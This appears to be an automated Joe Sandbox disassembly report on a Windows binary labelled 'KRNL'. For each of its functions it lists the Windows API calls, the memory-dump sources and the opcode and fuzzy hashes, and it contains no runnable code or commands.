• API String ID: 3956949563-0

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)

APIs
• FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,AB1687B8,?,006FD01A,?,?,00000000), ref: 006FCFCC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-$ext-ms-
• API String ID: 3664257935-537541572
• Opcode ID: 21038a4c6a263bb1b9d6a63042490184febd2546351c5734fa47e0009f45b87d
• Instruction ID: 794264b3dd513a880de7a660db47844131e8426facfd5debb747b33aefa0c95a
• Opcode Fuzzy Hash: 21038a4c6a263bb1b9d6a63042490184febd2546351c5734fa47e0009f45b87d
• Instruction Fuzzy Hash: 3721F631A02219ABCB218B68ED41AEAB75B9F457B0F254111FA59A73D0D774ED00CAD0

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: _strlen
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 4218353326-1866435925
• Opcode ID: 99cbaa5e053cdb58593a0a7daa164c7394eb774f9a877c9c3ace476a37f27fc7
• Instruction ID: 7310d915460194a38f4f7413e5305a81b8d8e06c819722eb617de05489a6494d
• Opcode Fuzzy Hash: 99cbaa5e053cdb58593a0a7daa164c7394eb774f9a877c9c3ace476a37f27fc7
• Instruction Fuzzy Hash: 98F15D75A012588FCB14CF69C494BADB7F2FF89320F198269E815AF391D734AD41CB90

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)

APIs
• CreateThread.KERNELBASE(00000000,00000000,Function_00015470,00000000,00000000,00000000), ref: 006F5392
• GetLastError.KERNEL32(?,?,?,006E2513,00000000,00000000), ref: 006F539E
• __dosmaperr.LIBCMT ref: 006F53A5
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: CreateErrorLastThread__dosmaperr
• String ID:
• API String ID: 2744730728-0
• Opcode ID: 7df5d19426a9e366a0978f194efc9b55882fcec4d60dfb664c7a0b0a9bba59a8
• Instruction ID: 266b5e9d29d7abbf13614b305caed00c5436bd552bd8dc0fd4288ec541b582db
• Opcode Fuzzy Hash: 7df5d19426a9e366a0978f194efc9b55882fcec4d60dfb664c7a0b0a9bba59a8
• Instruction Fuzzy Hash: 32012D7250561DABDF159FA8DC05AFE3BA6EF00391F108058FB0296190EBB1DD50DAA4

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)

APIs
  • Part of subcall function 006FC2BB: GetLastError.KERNEL32(00000000,?,006F76E9,006FD306,?,?,006FC1B7,00000001,00000364,?,00000005,000000FF,?,006F5495,00718E38,0000000C), ref: 006FC2BF
  • Part of subcall function 006FC2BB: SetLastError.KERNEL32(00000000), ref: 006FC361
• CloseHandle.KERNEL32(?,?,?,006F53D9,?,?,006F54CE,00000000), ref: 006F551F
• FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,006F53D9,?,?,006F54CE,00000000), ref: 006F5535
• ExitThread.KERNEL32 ref: 006F553E
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1991824761-0
                                                                                                                                                                                                                                                          • Opcode ID: fbe41fb29f43578eab2063c0e5997e91200ed80e641f8037c4c3579d69169ea0
                                                                                                                                                                                                                                                          • Instruction ID: e8790d09b6395eedf7fb669f2ba9f2708658f38ef1dc0299984371f172234eb0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbe41fb29f43578eab2063c0e5997e91200ed80e641f8037c4c3579d69169ea0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9BF0F471500A0967CB255F7998496BA3A9BAF00370B188614FBAAC72E1DB24ED52C794

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32(00000002,?,006F5721,006F8396,006F8396,?,00000002,AB1687B8,006F8396,00000002), ref: 006F5670
• TerminateProcess.KERNEL32(00000000,?,006F5721,006F8396,006F8396,?,00000002,AB1687B8,006F8396,00000002), ref: 006F5677
• ExitProcess.KERNEL32 ref: 006F5689
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 635c2a51b33c77d26b498cd2f640dff92d93e556bce2d7773a4f61819b751cd0
• Instruction ID: c3d4433d5b7c37ead2e87c436a30f4111f662253bbf25d4fa75f2f20a00ba2da
• Opcode Fuzzy Hash: 635c2a51b33c77d26b498cd2f640dff92d93e556bce2d7773a4f61819b751cd0
• Instruction Fuzzy Hash: 8AD09E31100508BBCF412F65EC0D8E93F2BEF40381744C014BB56891B2DF359D51DA98

Control-flow Graph

APIs
  • Part of subcall function 00703F9E: GetConsoleOutputCP.KERNEL32(AB1687B8,00000000,00000000,?), ref: 00704001
• WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,006F8584,?), ref: 00703D79
• GetLastError.KERNEL32(?,?,006F8584,?,006F87C8,00000000,?,00000000,006F87C8,?,?,?,00718FE8,0000002C,006F86B4,?), ref: 00703D83
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: ConsoleErrorFileLastOutputWrite
• String ID:
• API String ID: 2915228174-0
• Opcode ID: ed1486fc6a07da4e208f8b128248b2828f78674307ec7b5fc86ffeb384ffa155
• Instruction ID: 62e97723613b5c56a0f26bc10c353d1149627fdacc60b619481787c0bf16e06e
• Opcode Fuzzy Hash: ed1486fc6a07da4e208f8b128248b2828f78674307ec7b5fc86ffeb384ffa155
• Instruction Fuzzy Hash: 736171B5904159EFDF15DFA8C884AEEBBFDAB09304F144249E904E7292D779DA01CBA0

Control-flow Graph

APIs
• WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00703D5F,00000000,006F87C8,?,00000000,?,00000000), ref: 00704469
• GetLastError.KERNEL32(?,00703D5F,00000000,006F87C8,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,006F8584), ref: 0070448F
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID:
• API String ID: 442123175-0
• Opcode ID: 981bf949616a839a9e9b20c4ffc5e20eb4e3ed5e71cd2e59b881d077b7e58024
• Instruction ID: 6bd2013b2fbe04faaa34e0a0c1d476acb6e3734d7a67dad37b2942391c646656
• Opcode Fuzzy Hash: 981bf949616a839a9e9b20c4ffc5e20eb4e3ed5e71cd2e59b881d077b7e58024
• Instruction Fuzzy Hash: DF21B174A00258DBCF19CF19DC80AEDB7FAEB48305F1481A9EA06D7251E634EE42CB64

Control-flow Graph

APIs
• std::_Throw_Cpp_error.LIBCPMT ref: 006E91C9
• std::_Throw_Cpp_error.LIBCPMT ref: 006E91D7
  • Part of subcall function 006EEFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,006E8E4A,006EA2F0), ref: 006EEFE7
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: Cpp_errorThrow_std::_$ExclusiveLockRelease
• String ID:
• API String ID: 3666349979-0

Control-flow Graph (function at 6fda52; graph not rendered)
APIs
• GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,006FD941,00719330,0000000C), ref: 006FDA9E
• GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,006FD941,00719330,0000000C), ref: 006FDAB0
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: FileHandleType
• String ID:
• API String ID: 3000768030-0

Control-flow Graph

APIs
  • Part of subcall function 006E1240: _strlen.LIBCMT ref: 006E12BA
• FreeConsole.KERNELBASE(?,?,?,?,?,006E173F,?,?,?,00000000,?), ref: 006E1F21
• VirtualProtect.KERNELBASE(0071A011,00000549,00000040,?), ref: 006E1F78
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: ConsoleFreeProtectVirtual_strlen
• String ID:
• API String ID: 1248733679-0
APIs
• GetLastError.KERNEL32(00718E38,0000000C), ref: 006F5483
• ExitThread.KERNEL32 ref: 006F548A
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: ErrorExitLastThread
• String ID:
• API String ID: 1611280651-0
APIs
• GetModuleHandleA.KERNEL32(00000000), ref: 006E2288
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 006E229C
  • Part of subcall function 006E1FB0: CreateFileA.KERNELBASE ref: 006E2036
  • Part of subcall function 006E1FB0: GetFileSize.KERNEL32(00000000,00000000), ref: 006E2046
  • Part of subcall function 006E1FB0: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 006E206B
  • Part of subcall function 006E1FB0: CloseHandle.KERNELBASE(00000000), ref: 006E207A
  • Part of subcall function 006E1FB0: _strlen.LIBCMT ref: 006E20CD
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$HandleModule$CloseCreateNameReadSize_strlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3505371420-0
                                                                                                                                                                                                                                                          • Opcode ID: b4c42af7bbfc7ea98430c1ad9f099ac8b9f6eb596d1e684155966f2dddcebb0a
                                                                                                                                                                                                                                                          • Instruction ID: ac20e67e1bf43da642a831b8f7e1c31fc6c972f75e73055023c97470e99c208d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4c42af7bbfc7ea98430c1ad9f099ac8b9f6eb596d1e684155966f2dddcebb0a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FBF0E5B190135067D1616B29AC0BEEF7BACDF99710F008518F6894A1C1EA78614586E7
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,007002B4,?,00000000,?,?,006FFF54,?,00000007,?,?,0070089A,?,?), ref: 006FBEED
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,007002B4,?,00000000,?,?,006FFF54,?,00000007,?,?,0070089A,?,?), ref: 006FBEF8
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                                                                          • Opcode ID: 58f271d9eaef2254e5bf7dd9f46f9390a100cd8c37200114c0cf8e5d5f937242
                                                                                                                                                                                                                                                          • Instruction ID: 02783ddd433b28eeaffcbeb98c1c4133e592a92558274e4dc78d7e85b3136c91
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58f271d9eaef2254e5bf7dd9f46f9390a100cd8c37200114c0cf8e5d5f937242
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89E0E67120965867CB112FA9EC09BE53B59EB407D1F14D065F708962B0DB359850CFDC
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: be433b8706279428a230e0bab54746ab2c457702d4221f02d54a625234491247
                                                                                                                                                                                                                                                          • Instruction ID: 18fae3829320677e7c757cdf1ad6cfc252f4ff919e55ae1fc74f6588c39437d7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be433b8706279428a230e0bab54746ab2c457702d4221f02d54a625234491247
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD41B231A0125AAFCB14DF69C8949EEB7BAFF18310B544069E402E7780E731F955DB90
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 195648ee03f901e4bb2308761a8e81a369c4064c27545fad280009de945f649a
                                                                                                                                                                                                                                                          • Instruction ID: fed9328187b43f84450a3fa6b3cfc9f05eed19b14dc5d775bd78015324e4fd91
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 195648ee03f901e4bb2308761a8e81a369c4064c27545fad280009de945f649a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B731A57290135AAFCB04CF69D8949EDB7BABF09330B24426AE515E3390E731F945CB90
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006EAFC4: GetModuleHandleExW.KERNEL32(00000002,00000000,006E8A2A,?,?,006EAF87,006E8A2A,?,006EAF58,006E8A2A,?,?,?), ref: 006EAFD0
                                                                                                                                                                                                                                                          • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,AB1687B8,?,?,?,Function_0002BE94,000000FF), ref: 006EB0C7
                                                                                                                                                                                                                                                            • Part of subcall function 006EAEFA: std::_Throw_Cpp_error.LIBCPMT ref: 006EAF1B
                                                                                                                                                                                                                                                            • Part of subcall function 006EEFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,006E8E4A,006EA2F0), ref: 006EEFE7
                                                                                                                                                                                                                                                          Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: CallbackCpp_errorExclusiveFreeHandleLibraryLockModuleReleaseReturnsThrow_Whenstd::_
• String ID:
• API String ID: 3627539351-0
• Opcode ID: 6f8d09bf14bf78d0080f430f1551d341a3d603698602b6a9709ad00edad1cb47
• Instruction ID: 5776a58ec47a686e510e7026b3abeadd951e08d94b06d5a3dbf1affce1193980
• Opcode Fuzzy Hash: 6f8d09bf14bf78d0080f430f1551d341a3d603698602b6a9709ad00edad1cb47
• Instruction Fuzzy Hash: 0211083260178197CB256B6ADC11AAE77A7EB40B30F14841EF4119B7D0DB39F800CA5D
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ca8a213f58c9f77bdccfe9b822b1dedc6726edb08a12a592a492df5f920c21a0
• Instruction ID: 207fd71e75b8dbb90d5d2ddab558da24ba0b0f770407f275b6651fdebc204a45
• Opcode Fuzzy Hash: ca8a213f58c9f77bdccfe9b822b1dedc6726edb08a12a592a492df5f920c21a0
• Instruction Fuzzy Hash: AB01B53321022DAF9B168F6CEC42DB63367BBD4760B25C125FA14971D4DF31E8029798
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: CriticalLeaveSection
• String ID:
• API String ID: 3988221542-0
• Opcode ID: 96a6538addf4564e78c5d26393b0647f342f818839c202494ba64e53a08901f5
• Instruction ID: 66660ba0bf8e10886c9b14ff7c9f74354ea694ccfb8713580da69d79b42cd78b
• Opcode Fuzzy Hash: 96a6538addf4564e78c5d26393b0647f342f818839c202494ba64e53a08901f5
• Instruction Fuzzy Hash: DC0144B760A3C65ECB459B7EF92A6E8BB22FF96334B3041AFD111846C1DB129857C700
APIs
• Concurrency::details::_Release_chore.LIBCPMT ref: 006E77C6
  • Part of subcall function 006EAF64: CloseThreadpoolWork.KERNEL32(?,00000000,?,006E78DA,00000000), ref: 006EAF72
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: CloseConcurrency::details::_Release_choreThreadpoolWork
• String ID:
• API String ID: 312417170-0
• Opcode ID: f191cef12bd4acb898397c314ee240495c49e0f562f65fae248f65560a91a530
• Instruction ID: 23590ce9b480d5ff72bedd608b51aefe5b82b06fd0bb07d4f19f367cbe1af399
• Opcode Fuzzy Hash: f191cef12bd4acb898397c314ee240495c49e0f562f65fae248f65560a91a530
